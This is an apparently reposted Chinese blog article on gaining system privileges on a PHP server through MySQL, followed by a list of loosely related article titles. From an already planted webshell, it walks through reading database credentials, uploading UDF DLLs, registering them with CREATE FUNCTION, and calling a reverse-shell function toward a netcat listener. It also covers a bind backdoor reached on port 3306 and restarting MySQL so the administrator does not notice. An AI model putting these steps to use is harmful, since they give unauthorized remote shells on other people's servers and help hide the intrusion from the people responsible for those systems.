PHP主机如何利用MYSQL提权
来源:互联网 发布:dh算法的原根 编辑:程序博客网 时间:2024/04/29 09:50
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击 手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意 识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?
利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。
WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。看到了吧,用户名:root 密码:123456 库名:php
然后怎么办呢?先用SQL Query 建立连接,哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。
好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname d://php//php//Mix.dll; 来注册函数.
出现SQL语句成功执行!离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect(192.168.1.254,1234); 来激活那个函数,执行成功
然后看看我们的NC有反映没,成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就....
如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场 了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname D://php//php/my_udf.dll; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (); 然后用nc连接3306端口,然后输入fuck 就可以得到一个cmdshell了.
OK成功!
- PHP主机如何利用MYSQL提权
- PHP主机如何利用MYSQL提权
- **MYSQL中如何存取二进制文件&PHP主机的支持说明。
- 如何利用WAMP在51IDC的云主机上搭建PHP小型网站
- 如何利用php+mysql保存和输出文件
- 如何利用php+mysql保存和输出文件
- 如何利用phpMyAdmin创建数据库,设置编码 php apache MySQL
- 如何利用DigitalOcean设置主机名称
- Linux下Cpanel主机如何优化MySQL?
- MySQL 如何从其他主机连接数据库
- 利用 PHP 查询 ZABBIX API 信息, 获得主机当前使用率
- Mysql利用mysql_multi配置一台主机多个实例
- 利用伪master主机来增量恢复mysql
- Mysql利用mysql_multi配置一台主机…
- 如何利用PHP上传文件
- 如何利用php操作memcache?
- Linux技巧:如何利用Putty连接Linux主机
- 如何利用webmin在Linux主机中添加网站
- 飞腾浏览器(FlyIe) V1.1 绿色版
- 飞腾浏览器(FlyIe) V1.1 下载
- selenium:Web集成测试的利器
- jsp自定义标签知识
- VB.NET とオラクルの接続(一つ簡単なサンプル)
- PHP主机如何利用MYSQL提权
- 一个奇怪的故障
- 提权成功了:既然过滤了'/'字符,为什么不再加一个'/'呢
- WMIC:从命令行对Windows的全面管理
- 实时传输协议
- 在ASP.NET中执行URL重写经典方案
- Win32_SoftwareElement Class (Windows)
- windows系统重装后ubentu系统启动项的设置
- ibatis入门